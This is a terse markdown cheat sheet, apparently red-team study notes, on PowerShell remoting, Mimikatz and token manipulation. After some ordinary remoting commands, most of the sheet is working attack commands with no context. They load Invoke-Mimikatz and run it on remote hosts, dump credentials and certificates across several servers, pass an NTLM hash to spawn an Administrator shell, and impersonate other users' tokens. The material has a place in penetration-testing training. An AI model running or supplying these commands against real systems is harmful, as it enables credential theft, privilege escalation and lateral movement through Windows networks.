## Powershell Remoting

1. One to one
2. One to many

### enable powershell remoting

Enable-PSRemoting

## PSSession

1. Interactive
2. stateful
3. Runs in a new process (wsmprovhost)

### create new pssession

new-pssession -computername ComputerName

### enter pssession with session variable

enter-pssession	-session $session_variable

### one to many remoting with invoke-command and scriptblock

invoke-command -scriptblock {get-process} -computername (get-content server_list.txt)

### one to many remoting with invoke-command and file

invoke-command -filepath c:\script.ps1 -computername (get-content server_list.txt)

### run local function in remote host

import-module .\mimikatz.ps1
invoke-command -scriptblock ${function:Invoke-Mimikatz} -computername ComputerName

### run invoke-command with session

$session = new-pssession -computername comp1
invoke-command -session $session -scriptblock { $proc = Get-process }
invoke-command -session $session -scriptblock { $proc.name }
 
## Mimikatz

### dump credentials

invoke-mimikatz -dumpcreds

### dump certificates

invoke-mimikatz -dumpcerts

### dump credentials on multiple hosts

invoke-mimikatz -dumpcreds -computername @("serv1","serv2")

### over-pass-the-hash with mimikatz

invoke-mimikatz -command '"sekurlsa:pth /user:Administrator /domain:. /ntlm:ntlm_hash /run:powershell.exe"'

## Token Manipulation

### list all tokens on a machine

invoke-tokenmanipulation -showall

### list all unique usable tokens on the machine

invoke-tokenmanipulation -enumerate

### start new process with token of a specific user

invoke-tokenmanipulation -impersonateuser -username "domain\user"

### start new process with token of another process

Invoke-TokenManipulation -CreateProcess "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ProcessId 500